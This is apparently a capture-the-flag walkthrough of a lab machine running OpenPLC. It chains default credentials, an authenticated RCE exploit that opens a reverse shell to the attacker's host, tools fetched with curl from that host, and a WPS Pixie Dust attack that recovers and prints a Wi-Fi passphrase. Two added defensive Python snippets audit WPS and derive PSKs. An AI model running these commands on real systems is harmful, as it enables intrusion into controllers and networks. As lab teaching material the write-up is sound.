Wifinetic Two

OS: Linux
Difficulty: Medium
Points: 30

Nmap

nmap -v -p 22,8080 -sV -sC -oN nmap.txt 10.10.11.7
Nmap scan report for 10.10.11.7
Host is up (0.100s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy Werkzeug/1.0.1 Python/2.7.18
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/1.0.1 Python/2.7.18
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.10.11.7:8080/login

Enumeration

Port 8080 serves an application called OpenPLC with a login panel.

It can be accessed with the default credentials openplc : openplc, as shown in the image.

OpenPLC WebServer v3 - Authenticated RCE

Looking for a way to obtain RCE, we found the following script, which gives us a reverse shell.

python3 cve_2021_31630.py http://10.10.11.7:8080 -u openplc -p openplc -lh 10.10.14.89 -lp 1234

Privilege Escalation

The container has an extra network interface, wlan0.

root@attica02:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.3  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefb:30c8  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fb:30:c8  txqueuelen 1000  (Ethernet)
        RX packets 22858  bytes 2615654 (2.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 14063  bytes 5130529 (5.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 341  bytes 19415 (19.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 341  bytes 19415 (19.4 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 02:00:00:00:03:00  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Enumerating that interface, we notice that it has WPS enabled.

root@attica02:/tmp# iw dev wlan0 scan
BSS 02:00:00:00:01:00(on wlan0)
        last seen: 15088.152s [boottime]
        TSF: 1712736744946339 usec (19823d, 08:12:24)
        freq: 2412
        beacon interval: 100 TUs
        capability: ESS Privacy ShortSlotTime (0x0411)
        signal: -30.00 dBm
        last seen: 0 ms ago
        Information elements from Probe Response frame:
        SSID: plcrouter
        Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 
        DS Parameter set: channel 1
        ERP: Barker_Preamble_Mode
        Extended supported rates: 24.0 36.0 48.0 54.0 
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: PSK
                 * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
        Supported operating classes:
                 * current operating class: 81
        Extended capabilities:
                 * Extended Channel Switching
                 * SSID List
                 * Operating Mode Notification
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Response Type: 3 (AP)
                 * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
                 * Manufacturer:  
                 * Model:  
                 * Model Number:  
                 * Serial Number:  
                 * Primary Device Type: 0-00000000-0
                 * Device name:  
                 * Config methods: Label, Display, Keypad
                 * Version2: 2.0
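
The scan output above carries everything an audit needs: a "WPS:" block, a "Wi-Fi Protected Setup State" of Configured, and "Config methods" that include the PIN-based methods (Label, Display, Keypad). The following Python example is added here (it is not part of the write-up) and parses such `iw dev wlan0 scan` text to flag every BSS where WPS, and in particular PIN-based WPS, is still enabled; the sample input is a constructed excerpt, not a capture.

```python
import re
# Constructed excerpt of `iw dev wlan0 scan` output: the plcrouter BSS seen on
# the box plus a made-up WPS-less BSS for contrast (not a live capture).
SCAN_OUTPUT = """\
BSS 02:00:00:00:01:00(on wlan0)
        SSID: plcrouter
        WPS:     * Version: 1.0
                 * Wi-Fi Protected Setup State: 2 (Configured)
                 * Config methods: Label, Display, Keypad
BSS 02:00:00:00:02:00(on wlan0)
        SSID: corpnet
        RSN:     * Authentication suites: IEEE 802.1X
"""
# WPS config methods that involve the 8-digit PIN (PBC, push button, does not).
PIN_METHODS = {"Label", "Display", "Keypad"}

def parse_scan(text):
    """Split iw scan output into one dict per BSS with the fields the audit needs."""
    networks, cur = [], None
    for line in text.splitlines():
        bss = re.match(r"BSS ([0-9a-f:]{17})", line)
        if bss:
            cur = {"bssid": bss.group(1), "ssid": "", "wps": False,
                   "wps_state": None, "config_methods": []}
            networks.append(cur)
            continue
        s = line.strip()
        if cur is None:
            continue
        if s.startswith("SSID:"):
            cur["ssid"] = s.split(":", 1)[1].strip()
        elif s.startswith("WPS:"):
            cur["wps"] = True
        elif "Wi-Fi Protected Setup State:" in s:
            cur["wps_state"] = s.split(":", 1)[1].strip()
        elif s.startswith("* Config methods:"):
            cur["config_methods"] = [m.strip() for m in s.split(":", 1)[1].split(",")]
    return networks

def wps_findings(networks):
    """Return (bssid, ssid, reason) for each BSS whose WPS configuration needs review."""
    findings = []
    for n in networks:
        if not n["wps"]:
            continue
        pin = sorted(PIN_METHODS & set(n["config_methods"]))
        reason = ("WPS PIN methods enabled: " + ", ".join(pin)) if pin else "WPS enabled"
        findings.append((n["bssid"], n["ssid"], reason))
    return findings
```

Run it over `iw dev wlan0 scan > scan.txt` output from your own access points; any finding means WPS should be disabled on that AP.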

WPS Pixie Dust attack

Researching attacks on WPS, we can use the following resource: HackTricks Wifi.

We transfer the files needed to compile the program.

root@attica02:/tmp# curl 10.10.14.89/Makefile -o Makefile
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    82  100    82    0     0    403      0 --:--:-- --:--:-- --:--:--   403
root@attica02:/tmp# curl 10.10.14.89/oneshot.c -o oneshot.c
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 40390  100 40390    0     0  99332      0 --:--:-- --:--:-- --:--:-- 99238

We run the command:

make

Once compiled, we run the following command to obtain the PIN, the password and the AP name.

./oneshot -i wlan0 -K -b 02:00:00:00:01:00

Set up Network Interface

Researching how to use what we obtained, we came across this Post and also this Blog.

To configure the network interface with the information we have, we first generate the configuration file.

wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' > wpa.conf
root@attica02:/tmp# cat wpa.conf
network={
        ssid="plcrouter"
        #psk="NoWWEDoKnowWhaTisReal123!"
        psk=2bafe4e17630ef1834eaa9fa5c4d81fa5ef093c4db5aac5c03f1643fef02d156
}
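
The psk= line above is not a hash of the password on its own: wpa_passphrase derives it with PBKDF2-HMAC-SHA1 using the SSID as the salt, so the same passphrase yields a different PSK on any other network. The following Python example is added here (it is not from the write-up, nor from wpa_supplicant) and reproduces that derivation, emitting the network block without the "#psk=" comment that wpa_passphrase leaves in the file, since that comment keeps the plaintext passphrase on disk.

```python
import hashlib

def wpa_psk(ssid: str, passphrase: str) -> str:
    """Derive the WPA/WPA2-Personal PSK the way wpa_passphrase does:
    PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes), hex-encoded."""
    # IEEE 802.11 limits passphrases to 8..63 characters; 64 hex chars is a raw PSK.
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    key = hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                              ssid.encode("utf-8"), 4096, 32)
    return key.hex()

def wpa_network_block(ssid: str, passphrase: str) -> str:
    """Build the network={...} block in the layout wpa_passphrase prints, but
    without the '#psk=' line that would keep the plaintext passphrase in the file."""
    return 'network={\n\tssid="%s"\n\tpsk=%s\n}\n' % (ssid, wpa_psk(ssid, passphrase))
```

Keep the resulting file readable only by root (chmod 600), since the hex PSK alone is enough to join the network.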

Now we use wpa_supplicant to connect the interface to the network.

wpa_supplicant -B -i wlan0 -c wpa.conf
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information
nl80211: Could not set interface 'p2p-dev-wlan0' UP
nl80211: deinit ifname=p2p-dev-wlan0 disabled_11b_rates=0
p2p-dev-wlan0: Failed to initialize driver interface
p2p-dev-wlan0: CTRL-EVENT-DSCP-POLICY clear_all
P2P: Failed to enable P2P Device interface

Finally, we need to assign it an IP address. In this case dhclient cannot be used because the terminal hangs, so we configure the IP manually, using the default 192.168.1.0/24 range.

root@attica02:/tmp# ifconfig wlan0 192.168.1.2 netmask 255.255.255.0
root@attica02:/tmp# ifconfig                                        
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.3.3  netmask 255.255.255.0  broadcast 10.0.3.255
        inet6 fe80::216:3eff:fefb:30c8  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:fb:30:c8  txqueuelen 1000  (Ethernet)
        RX packets 25980  bytes 2871629 (2.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 15839  bytes 5291157 (5.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 351  bytes 20143 (20.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 351  bytes 20143 (20.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.2  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:300  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:03:00  txqueuelen 1000  (Ethernet)
        RX packets 8  bytes 1245 (1.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 80  bytes 7844 (7.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Now we connect over SSH.

ssh root@192.168.1.1